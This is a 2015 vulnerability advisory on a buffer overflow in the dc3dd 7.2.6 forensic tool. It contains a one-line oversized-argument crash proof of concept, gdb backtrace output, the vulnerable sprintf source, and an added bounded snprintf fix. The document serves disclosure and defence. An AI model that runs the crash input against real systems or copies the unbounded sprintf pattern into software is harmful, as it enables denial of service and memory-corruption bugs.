US DoD's Dc3dd v7.2.6 suffers from a Buffer Overflow vulnerability -- Advanced Information Security Corporation - Zero Day Research

From: Nicholas Lemonias. <>
Subject: US DoD's Dc3dd v7.2.6 suffers from a Buffer Overflow vulnerability -- Advanced Information Security Corporation - Zero Day Research

  DC3DD v.7.2.6 (LATEST) Security Report
                8' -  .88
                8`._.' Y8.
               d/      `8b.
              dP   .    Y8b.
             d8:'  "  `::88b
            d8"         'Y88b
           :8P    '      :888
            8a.   :     _a88P
          ._/"Yaa_:   .| 88P|
          \    YP"    `| 8P  `.
          /     \.___.d|    .'
    ~ Keeping Things Simple!
  Advanced Information Security Corporation
  Security Advisory
  Date: 14/10/2015
  Credit: Nicholas Lemonias
  Software: DC3DD v.7.2.6
 Vendor: US Department of Defense, DC3 Cybercrime Center & Air Force
  Office of Special Investigations -
  (1)  Buffer Overflow Vulnerability / ~ Deprecated & Insecure Function
  use (Missing Bounds-checks)

  Software Overview:
  DC3DD is a patched version of GNU 'dd', the popular UNIX imaging
  tool, with additional functionality, for use by forensic
  investigations experts. DC3DD is a popular package included by
  default in a number of popular Linux distributions. DC3DD was
  developed at the US Department of Defense, DC3 in February, 2008
  and authored by Jesse Kornblum.
  i. Proof of concept
  root@kali:# dc3dd `perl -e 'print "A" x 90000'`
  dc3dd 7.2.641 started at 2015-10-13 22:15:26 +0000 compiled options:
  *** buffer overflow detected ***: dc3dd terminated
  ======== Backtrace: ========
  /lib/i386-linux-gnu/i686/cmov/ chk+0x2f)[0xb76a5acf]
  ======== Memory map: ========
  b7400000-b741c000 r-xp 00000000 00:13 15866 /lib/i386-linux-gnu/
  b741c000-b741d000 rw-p 0001b000 00:13 15866 /lib/i386-linux-gnu/libgcc_s.so.1
  b743d000-b747c000 r--p 00000000 00:13 15130
  b747c000-b75ac000 r--p 00000000 00:13 15151
  b75ac000-b75ae000 rw-p 00000000 00:00 0
  b75ae000-b7752000 r-xp 00000000 00:13 1673
  b7752000-b7754000 r--p 001a4000 00:13 1673
  b7754000-b7755000 rw-p 001a6000 00:13 1673
  (gdb) bt
  #0 0xb7fdebe0 in __kernel_vsyscall ()
  #1 0xb7e22307 in __GI_raise (sig=sig@entry=6)
  at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
  #2 0xb7e239c3 in __GI_abort () at abort.c:89
  #3 0xb7e606f8 in __libc_message (do_abort=do_abort@entry=2,
  fmt=fmt@entry=0xb7f53e55 "*** %s ***: %s terminated\n")
  at ../sysdeps/posix/libc_fatal.c:175
  #4 0xb7eee2d5 in __GI___fortify_fail (
  msg=msg@entry=0xb7f53dd6 "buffer overflow detected") at fortify_fail.c:31
  #5 0xb7eec38a in __GI___chk_fail () at chk_fail.c:28
  #6 0xb7eebae8 in _IO_str_chk_overflow (fp=0xbfffbf00, c=65) at
  #7 0xb7e6404e in __GI__IO_default_xsputn (f=0xbfffbf00, data=0x800336e0, n=9015)
  at genops.c:480
  #8 0xb7e3945a in _IO_vfprintf_internal (s=s@entry=0xbfffbf00,
  format=<optimized out>, format@entry=0x80025418 "command line:
  ap=0xbfffc004 "\0307\002\200\005",
  ap@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005") at vfprintf.c:1642
  #9 0xb7eebba4 in ___vsprintf_chk (
  s=s@entry=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171
  flags=flags@entry=1, slen=slen@entry=4096,
  format=format@entry=0x80025418 "command line: %s\n",
  args=args@entry=0xbfffc000 "\340\066\003\200\030T\002\200\005")
  at vsprintf_chk.c:85
  #10 0xb7eebacf in ___sprintf_chk (
  s=0xbfffc010 "command line: /usr/bin/dc3dd ", 'A' <repeats 171 times>...,
  #11 0x80001f8f in ?? ()
  ---Type <return> to continue, or q <return> to quit---
  #12 0xb7e0da63 in __libc_start_main (main=0x2, argc=-2147464825, argv=0x0,
   init=0x800049b8, fini=0x80001af0, rtld_fini=0x2, stack_end=0xbfffd1d4)
  at libc-start.c:287
  #13 0x8002ee64 in ?? ()
  Backtrace stopped: previous frame inner to this frame (corrupt stack?)
  Program received signal SIGABRT, Aborted.
  0xb7fdebe0 in __kernel_vsyscall:
  (gdb) disas
  Dump of assembler code for function __kernel_vsyscall:
  0xb7fdebd0 <+0>:        push %ecx
  0xb7fdebd1 <+1>:        push %edx
  0xb7fdebd2 <+2>:        push %ebp
  0xb7fdebd3 <+3>:        mov  %esp,%ebp
  0xb7fdebd5 <+5>:        sysenter
  0xb7fdebd7 <+7>:        nop
  0xb7fdebd8 <+8>:        nop
  0xb7fdebd9 <+9>:        nop
  0xb7fdebda <+10>:       nop
  0xb7fdebdb <+11>:       nop
  0xb7fdebdc <+12>:       nop
  0xb7fdebdd <+13>:       nop
  0xb7fdebde <+14>:       int $0x80
  => 0xb7fdebe0 <+16>:    pop %ebp
  0xb7fdebe1 <+17>:       pop %edx
  0xb7fdebe2 <+18>:       pop %ecx
  0xb7fdebe3 <+19>:       ret
  End of assembler dump.
  Permission Set
  root@kali:~# ls -al /usr/bin/dc3dd
  -rwxr-xr-x 1 root root 189940 Oct  9   2014  /usr/bin/dc3dd
  The permission set illustrates that the software is owned by the
  superuser but is executable by all users.
  static void
  report_command_line(int argc, char* const* argv)
  {
     // Report compiled-in options.
     fputs(_("compiled options:"), stderr);
     report_compile_flags(stderr, false);
     for (log_t* log = job_logs; log; log = log->next_log) {
        fputs(_("compiled options:"), log->file);
        report_compile_flags(log->file, false);
     }
     for (log_t* log = hash_logs; log; log = log->next_log) {
        fputs(_("compiled options:"), log->file);
        report_compile_flags(log->file, false);
     }
     // Report the command line.
     char* command_line = make_cmd_line_string(argc, argv);
     char message[DISPLAY_MESSAGE_LENGTH];
     // Unbounded write: command_line comes from argv and may be longer
     // than the fixed-size message buffer.
     sprintf(message, _("command line: %s\n"), command_line);
     report(message, ALL_LOGS);
  }
  The proof of concept triggers the unsafe use of the sprintf()
  function shown above, which can facilitate a buffer overflow
  condition. In the aforementioned experiment, a char* string built
  from the command line is written into a fixed-length destination
  buffer. No manual bounds checks are provided to ensure that user
  input does not exceed the size of the destination buffer, so nothing
  prevents it from overwriting memory past the end of that buffer.
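
  A bounded way to build the same log line, as an added example that is not part of the advisory or of the dc3dd source. The function names are hypothetical, and DISPLAY_MESSAGE_LENGTH is assumed to be 4096 to match slen=4096 in the backtrace above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MESSAGE_LENGTH 4096   /* assumed: matches slen=4096 in the backtrace */

/* Bounded replacement for sprintf(message, "command line: %s\n", command_line).
 * Returns 0 if the whole line fit, 1 if it was truncated, -1 on error.
 * dst is always NUL-terminated when dst_len > 0. */
int format_command_line(char *dst, size_t dst_len, const char *command_line)
{
    int needed = snprintf(dst, dst_len, "command line: %s\n", command_line);
    if (needed < 0)
        return -1;
    return (size_t)needed >= dst_len ? 1 : 0;
}

/* Alternative: size the buffer from the input so nothing is lost from the log.
 * Returns a heap string the caller frees, or NULL on failure. */
char *alloc_command_line(const char *command_line)
{
    int needed = snprintf(NULL, 0, "command line: %s\n", command_line);
    if (needed < 0)
        return NULL;
    char *msg = malloc((size_t)needed + 1);
    if (msg != NULL)
        snprintf(msg, (size_t)needed + 1, "command line: %s\n", command_line);
    return msg;
}

int main(void)
{
    /* Constructed input: same shape as the proof of concept's 90000-byte argument. */
    char *arg = malloc(90001);
    if (arg == NULL) return 1;
    memset(arg, 'A', 90000);
    arg[90000] = '\0';

    char message[DISPLAY_MESSAGE_LENGTH];
    int truncated = format_command_line(message, sizeof message, arg);
    char *full = alloc_command_line(arg);
    printf("fixed buffer: truncated=%d, stored %zu bytes\n", truncated, strlen(message));
    printf("heap buffer: %zu bytes\n", full ? strlen(full) : 0);
    free(full);
    free(arg);
    return 0;
}
```

  For a forensic tool the heap variant matters: a silently truncated command line in the job log is an incomplete record, so the truncation flag from the fixed-buffer variant should at least be logged.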
 Advanced Information Security © 2015  All rights reserved
  Keeping Things Simple!